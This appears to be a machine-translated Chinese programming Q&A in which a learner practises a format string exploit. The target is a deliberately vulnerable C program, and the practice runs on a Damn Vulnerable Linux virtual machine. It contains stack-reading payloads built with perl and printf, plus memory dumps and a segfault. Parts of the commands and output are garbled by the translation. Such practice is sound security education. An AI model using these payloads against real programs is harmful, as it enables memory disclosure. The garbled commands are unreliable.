C 格式字符串漏洞练习
我试图利用一个格式字符串漏洞只是为了练习,但出现了一些问题。我的目标是利用这样一个bug来读取我选择的某个地址 这是我试图利用的代码:C 格式字符串漏洞练习,c,linux,security,exploit,C,Linux,Security,Exploit,我试图利用一个格式字符串漏洞只是为了练习,但出现了一些问题。我的目标是利用这样一个bug来读取我选择的某个地址 这是我试图利用的代码: #include <stdio.h> void main(int argv, char *argv[]){ printf(argv[1]); } 我通过以下操作找到了存储内存地址的确切位置: ./print AAAA`perl -e 'print "%08x."x141'` AAAA00000000.bffff0a8.080483fb.b7fc
#include <stdio.h>
void main(int argv, char *argv[]){
printf(argv[1]);
}
./print AAAA`perl -e 'print "%08x."x141'`
AAAA00000000.bffff0a8.080483fb.b7fcaffc.b7fcaffc.080494e8.b7fcaffc.00000000.b8000ce0.
bffff108.b7eb4e14.00000002.bffff134.bffff140.b7ff5b6c.b7fcaffc.00000000.bffff0c0.bffff108.
bffff0b0.b7eb4dd2.00000000.00000000.00000000.b8000ff8.00000002.080482d0.00000000.b7ff5aa0.
b7ff66b0.b8000ff8.00000002.080482d0.00000000.080482f1.080483a4.00000002.bffff134.080483e0.
08048440.b7ff66b0.bffff12c.b7ffee8e.00000002.bffff2ac.bffff2b4.00000000.bffff57a.bffff5dd.
bffff5f1.bffff5f8.bffff605.bffff615.bffff620.bffff674.bffff6bb.bffff6db.bffff6ef.bffff701.
bffff711.bffff729.bffff749.bffff761.bffff777.bffff781.bffffc71.bffffc7f.bffffc8f.bffffcbc.
bffffce7.bffffd08.bffffd33.bffffd41.bffffd5b.bffffe56.bffffe8b.bffffea0.bffffeba.bffffed2.
bfffff0a.bfffff11.bfffff19.bfffff24.bfffff3a.bfffff5f.bfffff67.bfffff74.bfffff82.bfffff9e.
bfffffb7.bfffffc2.bfffffcd.bfffffea.00000000.00000020.b7fe9400.00000021.b7fe9000.00000010.
078bfbff.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.
00000007.00000007.b7fea000.00000008.00000000.00000009.080482d0.0000000b.00000000.0000000c.
00000000.0000000d.00000000.0000000e.00000000.00000017.00000000.0000000f.bffff29b.00000000.
00000000.00000000.00000000.00000000.69000000.00363836.00000000.00000000.00000000.72702f2e.
00746e69.41414141.
./print $(printf "\xcb\x83\x04\x08")`perl -e 'print "%08x."x140 . "%s"'`
00000000.bffff0a8.080483fb.b7fcaffc.b7fcaffc.080494e8.b7fcaffc.00000000.b8000ce0.bffff108.
b7eb4e14.00000002.bffff134.bffff140.b7ff5b6c.b7fcaffc.00000000.bffff0c0.bffff108.bffff0b0.
b7eb4dd2.00000000.00000000.00000000.b8000ff8.00000002.080482d0.00000000.b7ff5aa0.b7ff66b0.
b8000ff8.00000002.080482d0.00000000.080482f1.080483a4.00000002.bffff134.080483e0.08048440.
b7ff66b0.bffff12c.b7ffee8e.00000002.bffff2af.bffff2b7.00000000.bffff57a.bffff5dd.bffff5f1.
bffff5f8.bffff605.bffff615.bffff620.bffff674.bffff6bb.bffff6db.bffff6ef.bffff701.bffff711.
bffff729.bffff749.bffff761.bffff777.bffff781.bffffc71.bffffc7f.bffffc8f.bffffcbc.bffffce7.
bffffd08.bffffd33.bffffd41.bffffd5b.bffffe56.bffffe8b.bffffea0.bffffeba.bffffed2.bfffff0a.
bfffff11.bfffff19.bfffff24.bfffff3a.bfffff5f.bfffff67.bfffff74.bfffff82.bfffff9e.bfffffb7.
bfffffc2.bfffffcd.bfffffea.00000000.00000020.b7fe9400.00000021.b7fe9000.00000010.078bfbff.
00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.
00000007.b7fea000.00000008.000Segmentationfault
我所期望的是在屏幕上显示一组字符,这些字符是从使用的地址到第一个\x00的字节,我做错了什么?如果不更改参数的长度,这将起作用 您删除一个
%08x.%senv-iperl-e'打印“%x.”x118。“%x”
4.FFF6.FFF6.FF6 6.FFF6.FFF6.F7.F7.E4.F7.F7.FF6.FFF6.FF6.FF6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F7.F7.F7.F7.F7.F7-53535.F7.F5.F7.F7.F7-5.F4.F7.F7-53535.F7.F7-5.F7.F7.F4.5.5.F7-5353535.5.5.F7.F7.5.5.5.F7-5.5.5 5 5 5 5.5.5.5 5 5 5 5.FF7-53535353535.5.F7.F7.F7.F7.FF7.F7.ffffd7dc.0.ffffd947.ffffd952.ffffd962.ffffd984.ffffd997.ffffd9a1.ffffdec2fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffvfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1F05.93944d19.697a2611.363836.0.616e2f2e.616767.4141
$./nagga$(printf“\x70\x84\x04\x08”)XXperl-e'打印“%x.”x118。“%s”
P�8.0.FFF6.FFF6.FFF6.FFF6.FF6.FF7.F4.5.FF4.F7.FF6.FF6.F6.0.FF7.FF6.F6.F6.0.F6.F6.F6.F6.F6.F6.F7.F7.F7.F7.F7.FF6.F6.FF6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F6.F7.F7.F7.FF7.FFF7.F7.FF7.FF7.F7.FFF7.F7.F7.7.F7.F7.F7.F7.F7.F7.7 FFD7DC.0.ffffd947.ffffd952.ffffd962.ffffd984.ffffd997.ffffd9a1.ffffdec2.fff他说,fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffvvvvvvvvvvvvvvvvvvvvvvvvvvvvvfffffffffffffffffffffffffffffffffffffffffffffvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvE.e60e0ac6.69afc87d.363836.0.616e2f2e.616767。�Ë$Ð���������U��s�������t��F����Ћ���U���[]Ð�s��r
工作正常。我在ubuntu 12.04.04 LTS虚拟机上试用过。ASLR已禁用(这在这里不重要)。您的第一个命令生成一个709字节长的字符串:echo-naaaa
perl-e'print“%08x.”x141'`wc-c。第二个命令生成707个字节:
echo-n$(printf“\xcb\x83\x04\x08”)perl-e'打印“%08x.”x140。“%s”|wc-c`。尝试使两个命令的长度完全相同,这样应该可以工作。谢谢您的回答。我尝试了你的建议(直接使用%x而不是%08x),效果很好!但我想了解,为什么我的解决方案不起作用?我理解%08x。比%s多3个字节,但由于这是堆栈中最后一个推入的字节(更高的地址),它们不应影响字符串指针和字符串本身之间的距离。据我所知,这件事重要吗?我错了吗?对不起,我在你回复的那一刻编辑了评论。我现在工作。问题确实是由于这3个字节。酷!我可以问一下你在哪里练习这个吗?当然,在我电脑上虚拟机上安装的DVL(该死的易受攻击的linux)操作系统上。
./print $(printf "\xcb\x83\x04\x08")`perl -e 'print "%08x."x140 . "%s"'`
00000000.bffff0a8.080483fb.b7fcaffc.b7fcaffc.080494e8.b7fcaffc.00000000.b8000ce0.bffff108.
b7eb4e14.00000002.bffff134.bffff140.b7ff5b6c.b7fcaffc.00000000.bffff0c0.bffff108.bffff0b0.
b7eb4dd2.00000000.00000000.00000000.b8000ff8.00000002.080482d0.00000000.b7ff5aa0.b7ff66b0.
b8000ff8.00000002.080482d0.00000000.080482f1.080483a4.00000002.bffff134.080483e0.08048440.
b7ff66b0.bffff12c.b7ffee8e.00000002.bffff2af.bffff2b7.00000000.bffff57a.bffff5dd.bffff5f1.
bffff5f8.bffff605.bffff615.bffff620.bffff674.bffff6bb.bffff6db.bffff6ef.bffff701.bffff711.
bffff729.bffff749.bffff761.bffff777.bffff781.bffffc71.bffffc7f.bffffc8f.bffffcbc.bffffce7.
bffffd08.bffffd33.bffffd41.bffffd5b.bffffe56.bffffe8b.bffffea0.bffffeba.bffffed2.bfffff0a.
bfffff11.bfffff19.bfffff24.bfffff3a.bfffff5f.bfffff67.bfffff74.bfffff82.bfffff9e.bfffffb7.
bfffffc2.bfffffcd.bfffffea.00000000.00000020.b7fe9400.00000021.b7fe9000.00000010.078bfbff.
00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.
00000007.b7fea000.00000008.000Segmentationfault